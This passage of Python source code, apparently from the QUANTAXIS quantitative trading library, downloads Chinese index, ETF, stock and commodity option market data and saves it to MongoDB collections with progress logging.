end_time),
ui_log=ui_log
)
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
start_time,
end_time
)
)
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
err.append(str(code))
QA_util_log_info(err, ui_log=ui_log)
__saving_work(code, coll)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_index_day(client=DATABASE, ui_log=None, ui_progress=None):
"""save index_day
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
__index_list = QA_fetch_get_stock_list('index')
coll = client.index_day
coll.create_index(
[('code',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll):
try:
ref_ = coll.find({'code': str(code)[0:6]})
end_time = str(now_time())[0:10]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['date']
QA_util_log_info(
'##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
if start_time != end_time:
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
QA_util_get_next_day(start_time),
end_time
)
)
)
else:
try:
start_time = '1990-01-01'
QA_util_log_info(
'##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
start_time,
end_time
)
)
)
except:
start_time = '2009-01-01'
QA_util_log_info(
'##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
start_time,
end_time
)
)
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
err.append(str(code))
QA_util_log_info(err, ui_log=ui_log)
for i_ in range(len(__index_list)):
# __saving_work('000001')
QA_util_log_info(
'The {} of Total {}'.format(i_,
len(__index_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(i_ / len(__index_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(i_ / len(__index_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(__index_list.index[i_][0], coll)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_index_min(client=DATABASE, ui_log=None, ui_progress=None):
"""save index_min
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
__index_list = QA_fetch_get_stock_list('index')
coll = client.index_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB05 Now Saving Index_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB05.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB05.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(__saving_work,
__index_list.index[i_][0],
coll)
for i_ in range(len(__index_list))
} # multi index ./.
count = 0
for i_ in concurrent.futures.as_completed(res):
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(__index_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(__index_list) * 10000.0))
QA_util_log_info(
'The {} of Total {}'.format(count,
len(__index_list)),
ui_log=ui_log
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_index_min(code : str, client=DATABASE, ui_log=None, ui_progress=None):
"""save single index_min
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
#__index_list = QA_fetch_get_stock_list('index')
__index_list = [code]
coll = client.index_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB05 Now Saving Index_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB05.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB05.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(__saving_work,
__index_list[i_],
coll)
for i_ in range(len(__index_list))
} # multi index ./.
count = 1
for i_ in concurrent.futures.as_completed(res):
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(__index_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(__index_list) * 10000.0))
QA_util_log_info(
'The {} of Total {}'.format(count,
len(__index_list)),
ui_log=ui_log
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_etf_day(code : str, client=DATABASE, ui_log=None):
"""save etf_day
Keyword Arguments:
code : single etf code
client {[type]} -- [description] (default: {DATABASE})
"""
#__index_list = QA_fetch_get_stock_list('etf')
coll = client.index_day
coll.create_index(
[('code',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll):
try:
ref_ = coll.find({'code': str(code)[0:6]})
end_time = str(now_time())[0:10]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['date']
QA_util_log_info(
'##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
if start_time != end_time:
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
QA_util_get_next_day(start_time),
end_time
)
)
)
else:
start_time = '1990-01-01'
QA_util_log_info(
'##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
if start_time != end_time:
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
start_time,
end_time
)
)
)
except:
err.append(str(code))
__saving_work(code, coll)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_etf_day(client=DATABASE, ui_log=None, ui_progress=None):
"""save etf_day
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
__index_list = QA_fetch_get_stock_list('etf')
coll = client.index_day
coll.create_index(
[('code',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll):
try:
ref_ = coll.find({'code': str(code)[0:6]})
end_time = str(now_time())[0:10]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['date']
QA_util_log_info(
'##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
if start_time != end_time:
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
QA_util_get_next_day(start_time),
end_time
)
)
)
else:
start_time = '1990-01-01'
QA_util_log_info(
'##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
.format(code,
start_time,
end_time),
ui_log=ui_log
)
if start_time != end_time:
coll.insert_many(
QA_util_to_json_from_pandas(
QA_fetch_get_index_day(
str(code),
start_time,
end_time
)
)
)
except:
err.append(str(code))
for i_ in range(len(__index_list)):
# __saving_work('000001')
QA_util_log_info(
'The {} of Total {}'.format(i_,
len(__index_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(i_ / len(__index_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(i_ / len(__index_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(__index_list.index[i_][0], coll)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_etf_min(client=DATABASE, ui_log=None, ui_progress=None):
"""save etf_min
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
__index_list = QA_fetch_get_stock_list('etf')
coll = client.index_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB07 Now Saving ETF_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB07.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB07.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(__saving_work,
__index_list.index[i_][0],
coll)
for i_ in range(len(__index_list))
} # multi index ./.
count = 1
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(__index_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(__index_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(__index_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_etf_min(code : str, client=DATABASE, ui_log=None, ui_progress=None):
"""save single etf_min
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
#__index_list = QA_fetch_get_stock_list('etf')
__index_list = [code]
coll = client.index_min
coll.create_index(
[
('code',
pymongo.ASCENDING),
('time_stamp',
pymongo.ASCENDING),
('date_stamp',
pymongo.ASCENDING)
]
)
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB07 Now Saving ETF_MIN ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
for type in ['1min', '5min', '15min', '30min', '60min']:
ref_ = coll.find({'code': str(code)[0:6], 'type': type})
end_time = str(now_time())[0:19]
if ref_.count() > 0:
start_time = ref_[ref_.count() - 1]['datetime']
QA_util_log_info(
'##JOB07.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data[1::])
)
else:
start_time = '2015-01-01'
QA_util_log_info(
'##JOB07.{} Now Saving {} from {} to {} =={} '.format(
['1min',
'5min',
'15min',
'30min',
'60min'].index(type),
str(code),
start_time,
end_time,
type
),
ui_log=ui_log
)
if start_time != end_time:
__data = QA_fetch_get_index_min(
str(code),
start_time,
end_time,
type
)
if len(__data) > 1:
coll.insert_many(
QA_util_to_json_from_pandas(__data)
)
except:
err.append(code)
executor = ThreadPoolExecutor(max_workers=4)
res = {
executor.submit(__saving_work,
__index_list[i_],
coll)
for i_ in range(len(__index_list))
} # multi index ./.
count = 1
for i_ in concurrent.futures.as_completed(res):
QA_util_log_info(
'The {} of Total {}'.format(count,
len(__index_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(count / len(__index_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(count / len(__index_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
count = count + 1
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_list(client=DATABASE, ui_log=None, ui_progress=None):
"""save stock_list
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
client.drop_collection('stock_list')
coll = client.stock_list
coll.create_index('code')
try:
# 🛠todo 这个应该是第一个任务 JOB01, 先更新股票列表!!
QA_util_log_info(
'##JOB08 Now Saving STOCK_LIST ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=5000
)
stock_list_from_tdx = QA_fetch_get_stock_list()
pandas_data = QA_util_to_json_from_pandas(stock_list_from_tdx)
coll.insert_many(pandas_data)
QA_util_log_info(
"完成股票列表获取",
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=10000
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
print(" Error save_tdx.QA_SU_save_stock_list exception!")
pass
def QA_SU_save_etf_list(client=DATABASE, ui_log=None, ui_progress=None):
"""save etf_list
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
try:
QA_util_log_info(
'##JOB16 Now Saving ETF_LIST ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=5000
)
etf_list_from_tdx = QA_fetch_get_stock_list(type_="etf")
pandas_data = QA_util_to_json_from_pandas(etf_list_from_tdx)
if len(pandas_data) > 0:
# 获取到数据后才进行drop collection 操作
client.drop_collection('etf_list')
coll = client.etf_list
coll.create_index('code')
coll.insert_many(pandas_data)
QA_util_log_info(
"完成ETF列表获取",
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=10000
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
print(" Error save_tdx.QA_SU_save_etf_list exception!")
pass
def QA_SU_save_stock_block(client=DATABASE, ui_log=None, ui_progress=None):
"""save stock_block
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
client.drop_collection('stock_block')
coll = client.stock_block
coll.create_index('code')
try:
QA_util_log_info(
'##JOB09 Now Saving STOCK_BlOCK ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=5000
)
coll.insert_many(
QA_util_to_json_from_pandas(QA_fetch_get_stock_block('tdx'))
)
QA_util_log_info(
'tdx Block ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=5000
)
# 🛠todo fixhere here 获取同花顺板块, 还是调用tdx的
coll.insert_many(
QA_util_to_json_from_pandas(QA_fetch_get_stock_block('ths'))
)
QA_util_log_info(
'ths Block ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=8000
)
QA_util_log_info(
'完成股票板块获取=',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=10000
)
coll.insert_many(
QA_util_to_json_from_pandas(QA_fetch_get_stock_block('QA'))
)
QA_util_log_info(
'QA_Select Block ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=8000
)
QA_util_log_info(
'完成股票板块获取=',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=10000
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
print(" Error save_tdx.QA_SU_save_stock_block exception!")
pass
def QA_SU_save_stock_info(client=DATABASE, ui_log=None, ui_progress=None):
"""save stock_info
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
client.drop_collection('stock_info')
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll = client.stock_info
coll.create_index('code')
err = []
def __saving_work(code, coll):
QA_util_log_info(
'##JOB10 Now Saving STOCK INFO ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
coll.insert_many(
QA_util_to_json_from_pandas(QA_fetch_get_stock_info(str(code)))
)
except:
err.append(str(code))
for i_ in range(len(stock_list)):
# __saving_work('000001')
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(i_ / len(stock_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(i_ / len(stock_list) * 10000.0))
QA_util_log_info('The {} of Total {}'.format(i_, len(stock_list)))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(stock_list[i_], coll)
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_transaction(
client=DATABASE,
ui_log=None,
ui_progress=None
):
"""save stock_transaction
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
stock_list = QA_fetch_get_stock_list().code.unique().tolist()
coll = client.stock_transaction
coll.create_index('code')
err = []
def __saving_work(code):
QA_util_log_info(
'##JOB11 Now Saving STOCK_TRANSACTION ==== {}'.format(str(code)),
ui_log=ui_log
)
try:
coll.insert_many(
QA_util_to_json_from_pandas(
# 🛠todo str(stock_list[code]) 参数不对?
QA_fetch_get_stock_transaction(
str(code),
'1990-01-01',
str(now_time())[0:10]
)
)
)
except:
err.append(str(code))
for i_ in range(len(stock_list)):
# __saving_work('000001')
QA_util_log_info(
'The {} of Total {}'.format(i_,
len(stock_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(i_ / len(stock_list) * 100))[0:4] + '%'
)
intLogProgress = int(float(i_ / len(stock_list) * 10000.0))
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(stock_list[i_])
if len(err) < 1:
QA_util_log_info('SUCCESS', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
########################################################################################################
def _save_option_commodity_ru_day(
client=DATABASE,
ui_log=None,
ui_progress=None
):
##################### ru 天然橡胶 ############################################################################
option_ru_contract_list = QA_fetch_get_commodity_option_RU_contract_time_to_market()
coll_option_commodity_ru_day = client.option_commodity_ru_day
coll_option_commodity_ru_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_option_commodity_ru_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY_COMMODITY_RU 天然橡胶 ==== {}'.format(
str(code)
),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_option_commodity_ru_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取 期权ru 天然橡胶 日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_RU_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_ru_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_M_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_ru_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_ru_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_ru_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_ru_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(
float(item / len(option_ru_contract_list) * 10000.0)
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(
option_ru_contract_list[item].code,
coll_option_commodity_ru_day
)
if len(err) < 1:
QA_util_log_info('SUCCESS save option ru day ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_c_day(
client=DATABASE,
ui_log=None,
ui_progress=None
):
##################### c 玉米 ############################################################################
option_c_contract_list = QA_fetch_get_commodity_option_C_contract_time_to_market()
coll_option_commodity_c_day = client.option_commodity_c_day
coll_option_commodity_c_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_option_commodity_c_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY_COMMODITY_C 玉米 ==== {}'.format(
str(code)
),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_option_commodity_c_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取 玉米C 天然橡胶 日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_C_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_c_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_C_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
start_date,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_c_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"*已经获取过这天的数据了* {}".format(start_date),
ui_log=ui_log
)
except Exception as error0:
print(error0)
err.append(str(code))
for item in range(len(option_c_contract_list)):
QA_util_log_info(
'The {} of Total {}'.format(item,
len(option_c_contract_list)),
ui_log=ui_log
)
strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
str(float(item / len(option_c_contract_list) * 100))[0:4] + '%'
)
intLogProgress = int(
float(item / len(option_c_contract_list) * 10000.0)
)
QA_util_log_info(
strLogProgress,
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=intLogProgress
)
__saving_work(
option_c_contract_list[item].code,
coll_option_commodity_c_day
)
if len(err) < 1:
QA_util_log_info('SUCCESS save option ru day ^_^ ', ui_log=ui_log)
else:
QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_cf_day(
client=DATABASE,
ui_log=None,
ui_progress=None
):
##################### cf 棉花 ############################################################################
option_cf_contract_list = QA_fetch_get_commodity_option_CF_contract_time_to_market()
coll_option_commodity_cf_day = client.option_commodity_cf_day
coll_option_commodity_cf_day.create_index(
[("code",
pymongo.ASCENDING),
("date_stamp",
pymongo.ASCENDING)]
)
err = []
def __saving_work(code, coll_option_commodity_cf_day):
try:
QA_util_log_info(
'##JOB12 Now Saving OPTION_DAY_COMMODITY_CF 棉花 ==== {}'.format(
str(code)
),
ui_log=ui_log
)
# 首选查找数据库 是否 有 这个代码的数据
ref = coll_option_commodity_cf_day.find({'code': str(code)[0:8]})
end_date = str(now_time())[0:10]
# 当前数据库已经包含了这个代码的数据, 继续增量更新
# 加入这个判断的原因是因为如果是刚上市的 数据库会没有数据 所以会有负索引问题出现
if ref.count() > 0:
# 接着上次获取的日期继续更新
start_date = ref[ref.count() - 1]['date']
QA_util_log_info(
' 上次获取 期权ru 天然橡胶 日线数据的最后日期是 {}'.format(start_date),
ui_log=ui_log
)
QA_util_log_info(
'UPDATE_OPTION_CF_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
start_date0 = QA_util_get_next_day(start_date)
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date0,
end_date=end_date,
frequence='day',
ip=None,
port=None
)
retCount = df0.iloc[:, 0].size
QA_util_log_info(
"日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
start_date0,
end_date,
code,
retCount
),
ui_log=ui_log
)
coll_option_commodity_cf_day.insert_many(
QA_util_to_json_from_pandas(df0)
)
else:
QA_util_log_info(
"^已经获取过这天的数据了^ {}".format(start_date),
ui_log=ui_log
)
else:
start_date = '1990-01-01'
QA_util_log_info(
'UPDATE_M_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
.format(code,
start_date,
end_date),
ui_log=ui_log
)
if start_date != end_date:
df0 = QA_fetch_get_option_day(
code=code,
start_date=start_date,
end_date=end_date,
frequence='day',
ip=None,
